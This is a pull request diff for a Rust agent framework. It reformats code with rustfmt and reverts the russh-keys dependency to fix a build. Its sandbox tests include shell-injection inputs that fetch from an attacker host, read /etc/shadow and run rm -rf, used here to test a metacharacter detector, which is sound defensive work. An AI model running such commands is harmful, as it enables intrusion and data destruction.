-            "event: {{event}}".to_string(),
-            0,
-            None,
-            Some(0), // zero cooldown so the trigger fires immediately on every evaluation
-            Some(SessionMode::New),
-            None,
-        ).unwrap();
+        let tid = engine
+            .register_with_target(
+                agent_id,
+                TriggerPattern::All,
+                "event: {{event}}".to_string(),
+                0,
+                None,
+                Some(0), // zero cooldown so the trigger fires immediately on every evaluation
+                Some(SessionMode::New),
+                None,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -2376,16 +2438,18 @@ mod tests {
 
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        engine.register_with_target(
-            agent_id,
-            TriggerPattern::All,
-            "event: {{event}}".to_string(),
-            0,
-            None,
-            Some(0),
-            Some(SessionMode::Persistent),
-            None,
-        ).unwrap();
+        engine
+            .register_with_target(
+                agent_id,
+                TriggerPattern::All,
+                "event: {{event}}".to_string(),
+                0,
+                None,
+                Some(0),
+                Some(SessionMode::Persistent),
+                None,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -2411,16 +2475,18 @@ mod tests {
     fn session_mode_none_trigger_yields_none_override() {
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        engine.register_with_target(
-            agent_id,
-            TriggerPattern::All,
-            "event: {{event}}".to_string(),
-            0,
-            None,
-            Some(0),
-            None, // no per-trigger session mode
-            None,
-        ).unwrap();
+        engine
+            .register_with_target(
+                agent_id,
+                TriggerPattern::All,
+                "event: {{event}}".to_string(),
+                0,
+                None,
+                Some(0),
+                None, // no per-trigger session mode
+                None,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -2487,16 +2553,18 @@ mod tests {
 
         let engine = TriggerEngine::new();
         let agent_id = AgentId::new();
-        let tid = engine.register_with_target(
-            agent_id,
-            TriggerPattern::All,
-            "event: {{event}}".to_string(),
-            0,
-            None,
-            Some(0),
-            Some(SessionMode::New),
-            None,
-        ).unwrap();
+        let tid = engine
+            .register_with_target(
+                agent_id,
+                TriggerPattern::All,
+                "event: {{event}}".to_string(),
+                0,
+                None,
+                Some(0),
+                Some(SessionMode::New),
+                None,
+            )
+            .unwrap();
 
         // Sanity: override is present before the patch.
         assert_eq!(
@@ -2541,16 +2609,18 @@ mod tests {
         };
         let agent_id = AgentId::new();
         // Register with a 60-second cooldown so it won't expire during the test.
-        let tid = engine1.register_with_target(
-            agent_id,
-            TriggerPattern::All,
-            "Event: {{event}}".to_string(),
-            0,
-            None,
-            Some(60),
-            None,
-            None,
-        ).unwrap();
+        let tid = engine1
+            .register_with_target(
+                agent_id,
+                TriggerPattern::All,
+                "Event: {{event}}".to_string(),
+                0,
+                None,
+                Some(60),
+                None,
+                None,
+            )
+            .unwrap();
 
         let event = Event::new(
             AgentId::new(),
@@ -2698,12 +2768,14 @@ mod tests {
         let agent = AgentId::new();
 
         // Register a runtime-only trigger.
-        let runtime_id = engine.register(
-            agent,
-            TriggerPattern::Lifecycle,
-            "runtime {{event}}".to_string(),
-            0,
-        ).unwrap();
+        let runtime_id = engine
+            .register(
+                agent,
+                TriggerPattern::Lifecycle,
+                "runtime {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         // Empty manifest, Keep policy → orphan survives.
         let report = engine.reconcile_manifest_triggers(agent, &[], OrphanPolicy::Keep, |_| None);
@@ -2720,12 +2792,14 @@ mod tests {
         let engine = TriggerEngine::new();
         let agent = AgentId::new();
 
-        let runtime_id = engine.register(
-            agent,
-            TriggerPattern::Lifecycle,
-            "runtime {{event}}".to_string(),
-            0,
-        ).unwrap();
+        let runtime_id = engine
+            .register(
+                agent,
+                TriggerPattern::Lifecycle,
+                "runtime {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         // Empty manifest, Warn policy → orphan kept, no delete.
         let report = engine.reconcile_manifest_triggers(agent, &[], OrphanPolicy::Warn, |_| None);
@@ -2739,12 +2813,14 @@ mod tests {
         let engine = TriggerEngine::new();
         let agent = AgentId::new();
 
-        let runtime_id = engine.register(
-            agent,
-            TriggerPattern::Lifecycle,
-            "runtime {{event}}".to_string(),
-            0,
-        ).unwrap();
+        let runtime_id = engine
+            .register(
+                agent,
+                TriggerPattern::Lifecycle,
+                "runtime {{event}}".to_string(),
+                0,
+            )
+            .unwrap();
 
         // Empty manifest, Delete policy → orphan removed.
         let report = engine.reconcile_manifest_triggers(agent, &[], OrphanPolicy::Delete, |_| None);
@@ -3002,12 +3078,8 @@ mod tests {
         };
         let manifest = vec![make_trigger(0), make_trigger(1), make_trigger(2)];
 
-        let report = engine.reconcile_manifest_triggers(
-            agent,
-            &manifest,
-            OrphanPolicy::Keep,
-            |_| None,
-        );
+        let report =
+            engine.reconcile_manifest_triggers(agent, &manifest, OrphanPolicy::Keep, |_| None);
 
         assert_eq!(
             report.created, 0,

--- a/crates/librefang-memory/src/substrate.rs
+++ b/crates/librefang-memory/src/substrate.rs
@@ -2476,13 +2476,9 @@ mod tests {
         let tmp = tempfile::tempdir().unwrap();
         let db_path = tmp.path().join("test.db");
 
-        let _substrate = MemorySubstrate::open_with_pool_size(
-            &db_path,
-            0.0,
-            ChunkConfig::default(),
-            1,
-        )
-        .expect("substrate open");
+        let _substrate =
+            MemorySubstrate::open_with_pool_size(&db_path, 0.0, ChunkConfig::default(), 1)
+                .expect("substrate open");
 
         let mode = std::fs::metadata(&db_path)
             .expect("db exists after open")
@@ -2507,13 +2503,9 @@ mod tests {
         let tmp = tempfile::tempdir().unwrap();
         let db_path = tmp.path().join("test.db");
 
-        let substrate = MemorySubstrate::open_with_pool_size(
-            &db_path,
-            0.0,
-            ChunkConfig::default(),
-            1,
-        )
-        .expect("substrate open");
+        let substrate =
+            MemorySubstrate::open_with_pool_size(&db_path, 0.0, ChunkConfig::default(), 1)
+                .expect("substrate open");
 
         // Forcibly trigger a WAL flush by creating a session — that
         // makes `-wal` / `-shm` appear so the helper has something to

--- a/crates/librefang-runtime/Cargo.toml
+++ b/crates/librefang-runtime/Cargo.toml
@@ -71,7 +71,7 @@ pdf-extract = "0.10"
 # `internal-russh-forked-ssh-key` which conflicts with the workspace's
 # `rand = "0.10"` direct dep on the rand_core trait surface.
 russh = { version = "0.45", optional = true }
-russh-keys = { version = "0.49", optional = true }
+russh-keys = { version = "0.45", optional = true }
 
 [target.'cfg(unix)'.dependencies]
 libc = "0.2"

--- a/crates/librefang-runtime/src/agent_loop/message.rs
+++ b/crates/librefang-runtime/src/agent_loop/message.rs
@@ -257,9 +257,8 @@ pub(super) fn safe_trim_messages(
         // Run the same repair pair on the persisted blob so the
         // reload-after-trim path can't load an unsendable history.
         *session_messages = crate::session_repair::validate_and_repair(session_messages);
-        *session_messages = crate::session_repair::ensure_starts_with_user(
-            std::mem::take(session_messages),
-        );
+        *session_messages =
+            crate::session_repair::ensure_starts_with_user(std::mem::take(session_messages));
     }
 
     if messages.len() <= max_history {
@@ -475,10 +474,7 @@ mod safe_trim_session_repair_tests {
         // The persisted session MUST start with a user message
         // after the trim, even though a pinned assistant got
         // rescued to position 0 before the repair pass.
-        assert!(
-            !session.is_empty(),
-            "trim should leave a non-empty session"
-        );
+        assert!(!session.is_empty(), "trim should leave a non-empty session");
         assert_eq!(
             session[0].role,
             Role::User,

--- a/crates/librefang-runtime/src/agent_loop/web_augment.rs
+++ b/crates/librefang-runtime/src/agent_loop/web_augment.rs
@@ -257,7 +257,10 @@ mod tests {
     #[async_trait::async_trait]
     impl LlmDriver for ResponseFormatRecordingDriver {
         async fn complete(&self, req: CompletionRequest) -> Result<CompletionResponse, LlmError> {
-            self.observed.lock().unwrap().push(req.response_format.clone());
+            self.observed
+                .lock()
+                .unwrap()
+                .push(req.response_format.clone());
             Ok(CompletionResponse {
                 content: vec![ContentBlock::Text {
                     text: r#"{"queries": []}"#.to_string(),

--- a/crates/librefang-runtime/src/history_fold.rs
+++ b/crates/librefang-runtime/src/history_fold.rs
@@ -1908,7 +1908,10 @@ mod tests {
     #[async_trait::async_trait]
     impl LlmDriver for ResponseFormatRecordingDriver {
         async fn complete(&self, req: CompletionRequest) -> Result<CompletionResponse, LlmError> {
-            self.observed.lock().unwrap().push(req.response_format.clone());
+            self.observed
+                .lock()
+                .unwrap()
+                .push(req.response_format.clone());
             // Echo back per-id JSON so the fold proceeds end-to-end —
             // we only care about the recorded `response_format` here.
             let prompt = match &req.messages[0].content {

--- a/crates/librefang-runtime/src/subprocess_sandbox.rs
+++ b/crates/librefang-runtime/src/subprocess_sandbox.rs
@@ -1267,8 +1267,7 @@ mod tests {
         // $() inside double quotes — the audit's primary example.
         assert!(contains_shell_metacharacters(r#"echo "$(id)""#).is_some());
         assert!(
-            contains_shell_metacharacters(r#"echo "$(curl https://attacker.example/x)""#)
-                .is_some()
+            contains_shell_metacharacters(r#"echo "$(curl https://attacker.example/x)""#).is_some()
         );
         assert!(contains_shell_metacharacters(r#"cat "$(cat /etc/shadow)""#).is_some());
         // Backtick form inside double quotes.
@@ -1278,10 +1277,7 @@ mod tests {
         // `${IFS}` trick lets the attacker smuggle whitespace past
         // outer-binary allowlists ("echo ${IFS}rm -rf /").
         assert!(contains_shell_metacharacters(r#"echo "${IFS}id""#).is_some());
-        assert!(
-            contains_shell_metacharacters(r#"echo "${IFS}rm -rf /tmp/foo${IFS}""#)
-                .is_some()
-        );
+        assert!(contains_shell_metacharacters(r#"echo "${IFS}rm -rf /tmp/foo${IFS}""#).is_some());
     }
 
     #[test]

--- a/crates/librefang-types/src/i18n.rs
+++ b/crates/librefang-types/src/i18n.rs
@@ -273,10 +273,7 @@ mod tests {
     fn api_error_generic_interpolates_underlying_error() {
         for lang in SUPPORTED_LANGUAGES {
             let t = ErrorTranslator::new(lang);
-            let result = t.t_args(
-                "api-error-generic",
-                &[("error", "session DB corrupted")],
-            );
+            let result = t.t_args("api-error-generic", &[("error", "session DB corrupted")]);
             assert_ne!(
                 result, "api-error-generic",
                 "lang '{lang}': api-error-generic must be defined; got literal key",

--- a/crates/librefang-types/src/oauth.rs
+++ b/crates/librefang-types/src/oauth.rs
@@ -69,10 +69,7 @@ impl std::fmt::Debug for OAuthTokens {
     fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
         f.debug_struct("OAuthTokens")
             .field("access_token", &redact(&self.access_token))
-            .field(
-                "refresh_token",
-                &self.refresh_token.as_deref().map(redact),
-            )
+            .field("refresh_token", &self.refresh_token.as_deref().map(redact))
             .field("token_type", &self.token_type)
             .field("expires_in", &self.expires_in)
             .field("scope", &self.scope)
@@ -99,7 +96,11 @@ fn redact(secret: &str) -> String {
     if hint_chars == 0 {
         return format!("<redacted len={len}>");
     }
-    let hint: String = secret.chars().rev().take(hint_chars).collect::<Vec<_>>()
+    let hint: String = secret
+        .chars()
+        .rev()
+        .take(hint_chars)
+        .collect::<Vec<_>>()
         .into_iter()
         .rev()
         .collect();
@@ -249,7 +250,10 @@ mod tests {
         };
         let dbg = format!("{tokens:?}");
         assert!(!dbg.contains("abc123"), "access still leaking: {dbg}");
-        assert!(dbg.contains("None"), "missing refresh must render as None: {dbg}");
+        assert!(
+            dbg.contains("None"),
+            "missing refresh must render as None: {dbg}"
+        );
     }
 
     #[test]

--- a/crates/librefang-wire/src/message.rs
+++ b/crates/librefang-wire/src/message.rs
@@ -229,9 +229,7 @@ pub fn classify_unknown(body: &[u8], msg: &WireMessage) -> Option<UnknownTag> {
         WireMessageKind::Unknown => UnknownLevel::Envelope,
         WireMessageKind::Request(WireRequest::Unknown) => UnknownLevel::RequestMethod,
         WireMessageKind::Response(WireResponse::Unknown) => UnknownLevel::ResponseMethod,
-        WireMessageKind::Notification(WireNotification::Unknown) => {
-            UnknownLevel::NotificationEvent
-        }
+        WireMessageKind::Notification(WireNotification::Unknown) => UnknownLevel::NotificationEvent,
         _ => return None,
     };
     // The `serde(other)` arm doesn't capture the raw tag the peer


### PR DESCRIPTION
Closes #5537

## Root cause

Push-CI on \`main\` is green but **skips** the Quality job (rustfmt, `cargo clippy --all-features`) and the integration shards — those lanes are `pull_request`-only. Drift and feature-gated compile breakage therefore accumulate on `main` undetected and gate every open PR's Quality job.

## What this PR does (rebased onto current main — scope reduced)

Two of the four issues from the original draft already landed on `main` independently, so this PR is now minimal:

1. **`ssh-backend` compile break** (`crates/librefang-runtime/Cargo.toml`, `Cargo.lock`) — dependabot #5271 bumped `russh-keys` 0.45 → 0.49 while `russh` stays pinned at 0.45 (last release on `rand 0.8`; later releases pull a forked ssh-key surface that clashes with the workspace `rand 0.10` dep — see the comment block in the Cargo.toml). `tool_exec_ssh.rs` is written against the 0.45 API, so `--features ssh-backend` fails to compile under 0.49. The break is invisible to default CI but fails Quality's `--all-features` clippy lane. Reverted `russh-keys` to 0.45; `Cargo.lock` drops the 0.49-only subtree. Verified: `cargo check -p librefang-runtime --features ssh-backend` passes.

2. **Workspace rustfmt drift** — `cargo fmt --all` over the tree; 17 files reformatted to satisfy CI's stable rustfmt (1.9.0-stable). Pure formatting, no logic changes.

## Already on main (dropped from this PR)

- `comms_send_rejects_oversize_message` fixture now pins `MAX_MESSAGE_BYTES + 1` on main (`network_routes_integration.rs:421`).
- `external_auth_proxy` overlay descriptor + EXCLUDED entry already present on main (`config_schema_overlay.rs:231`).

## Not in scope: prettier

The Quality job runs `cargo xtask fmt`, whose prettier step is gated on `has_command("prettier") || has_command("pnpm")`. The Quality runner installs neither, so CI prints **"prettier/pnpm not found — skipping web formatting"** and never checks prettier. Reformatting web/dashboard/docs would be a 200+-file diff that no CI gate verifies, so it is deliberately excluded.

## Verification

- `cargo check -p librefang-runtime --features ssh-backend` — passes (was the failing build).
- `cargo fmt --all --check` — clean (0 remaining diffs).
- Branch reset onto current `origin/main` and re-derived (not a stale rebase), so the diff is exactly the two concerns above.